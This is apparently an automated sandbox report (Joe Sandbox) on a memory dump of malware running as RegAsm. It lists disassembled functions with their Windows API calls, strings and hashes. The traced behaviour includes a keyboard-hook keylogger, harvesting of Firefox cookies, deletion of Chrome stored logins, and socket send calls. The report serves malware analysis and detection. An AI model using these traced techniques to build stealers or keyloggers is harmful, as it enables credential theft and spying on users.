                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                        • String ID: lJD$lJD$lJD
                                                                        • API String ID: 745075371-479184356
                                                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                        Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$FirstNext
                                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                        • API String ID: 1164774033-405221262
                                                                        • Opcode ID: 4ae1af847c86cfc22abb557c668e09cb8c114ad66c721bf11deb43d1aacda498
                                                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                        • Opcode Fuzzy Hash: 4ae1af847c86cfc22abb557c668e09cb8c114ad66c721bf11deb43d1aacda498
                                                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                        Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Find$CreateFirstNext
                                                                        • String ID: 8SG$@5U$PXG$PXG$NG
                                                                        • API String ID: 341183262-3945603504
                                                                        • Opcode ID: a26c75fc68054aa2cc48b03a60bc0a22f930587166dfe62aa5b6b677dfbb1f5b
                                                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                        • Opcode Fuzzy Hash: a26c75fc68054aa2cc48b03a60bc0a22f930587166dfe62aa5b6b677dfbb1f5b
                                                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                        Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                        • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                        • GetLastError.KERNEL32 ref: 0040A2ED
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • GetMessageA.USER32 ref: 0040A33B
                                                                        • TranslateMessage.USER32(?), ref: 0040A34A
                                                                        • DispatchMessageA.USER32 ref: 0040A355
                                                                        Strings
                                                                        • Keylogger initialization failure: error , xrefs: 0040A301
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                        • String ID: Keylogger initialization failure: error
                                                                        • API String ID: 3219506041-952744263
                                                                        • Opcode ID: 83cf61fcc4db7adf9d4bbc8500479a2a59ba994a5a836eeaba27c80e8cfaac76
                                                                        • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                        • Opcode Fuzzy Hash: 83cf61fcc4db7adf9d4bbc8500479a2a59ba994a5a836eeaba27c80e8cfaac76
                                                                        • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                        Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                        • String ID:
                                                                        • API String ID: 1888522110-0
                                                                        • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                        • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                        Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                        • API String ID: 2127411465-314212984
                                                                        • Opcode ID: 45c2350e7e295625bd4dac20ddbecf348a3a6cbee010952884366c1c3e89a588
                                                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                        • Opcode Fuzzy Hash: 45c2350e7e295625bd4dac20ddbecf348a3a6cbee010952884366c1c3e89a588
                                                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                        Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00449212
                                                                        • _free.LIBCMT ref: 00449236
                                                                        • _free.LIBCMT ref: 004493BD
                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                        • _free.LIBCMT ref: 00449589
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 314583886-0
                                                                        • Opcode ID: a0df98c9171fe928957a71b0f613fe22cde1b567892c52a540cd8d6d0b3e47ec
                                                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                        • Opcode Fuzzy Hash: a0df98c9171fe928957a71b0f613fe22cde1b567892c52a540cd8d6d0b3e47ec
                                                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                        Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                        • API String ID: 1589313981-2876530381
                                                                        • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                        • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                        Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP$['E
                                                                        • API String ID: 2299586839-2532616801
                                                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                        Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                        • GetLastError.KERNEL32 ref: 0040BA58
                                                                        Strings
                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                        • UserProfile, xrefs: 0040BA1E
                                                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteErrorFileLast
                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                        • API String ID: 2018770650-1062637481
                                                                        • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                        • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                        Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                        • GetLastError.KERNEL32 ref: 0041799D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 3534403312-3733053543
                                                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                        Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 00409258
                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00B64958,00000010), ref: 004048E0
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                        • String ID:
                                                                        • API String ID: 1824512719-0
                                                                        • Opcode ID: 6cad6af0f329120c81c925ac196a2686bd147d6e8b43e11fbd3a5bfa6db4d0ce
                                                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                        • Opcode Fuzzy Hash: 6cad6af0f329120c81c925ac196a2686bd147d6e8b43e11fbd3a5bfa6db4d0ce
                                                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                        Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                        • String ID:
                                                                        • API String ID: 276877138-0
                                                                        • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                        • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                        Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindResourceA.KERNEL32 ref: 0041B4B9
                                                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID: SETTINGS
                                                                        • API String ID: 3473537107-594951305
                                                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                        Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 0040966A
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                        • String ID:
                                                                        • API String ID: 1157919129-0
                                                                        • Opcode ID: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                                                                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                        • Opcode Fuzzy Hash: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                                                                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                        Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 00408811
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                        • String ID:
                                                                        • API String ID: 1771804793-0
                                                                        • Opcode ID: 0f06b2c920d3f56931589272aebff858d631c73faf5deba1a71424e6e633b9f6
                                                                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                        • Opcode Fuzzy Hash: 0f06b2c920d3f56931589272aebff858d631c73faf5deba1a71424e6e633b9f6
